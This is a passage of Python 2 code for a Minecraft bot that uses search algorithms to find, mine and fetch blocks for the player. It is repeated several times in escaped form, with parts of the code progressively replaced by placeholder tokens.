self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n <function token>\n <function token>\n <function token>\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n\n def _surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n\n def _get_mine_actions(self):\n \"\"\"Return a list of legal mining actions (that only involve mining\n and not moving).\"\"\"\n rtn = []\n dont_mine = {_AIR, _WATER, _LAVA}\n pos_above = self._pos + _Vec3(0, 2, 0)\n if self._get_block(pos_above) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos_above,)})\n for dir_ in _adj_dirs():\n pos = self._pos + dir_\n for _ in xrange(2):\n if self._get_block(pos) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos,)})\n pos = pos + _Vec3(0, 1, 0)\n return rtn\n <function token>\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n <function token>\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n <function token>\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n\n\nclass _GenericBot:\n <docstring token>\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n <function token>\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n <function token>\n <function token>\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n <function token>\n <function token>\n <function token>\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n\n def _surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n <function token>\n <function token>\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n <function token>\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n <function token>\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n\n\nclass _GenericBot:\n <docstring token>\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n <function token>\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n <function token>\n <function token>\n <function token>\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n <function token>\n <function token>\n <function token>\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n\n def _surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n <function token>\n <function token>\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n <function token>\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n <function token>\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and 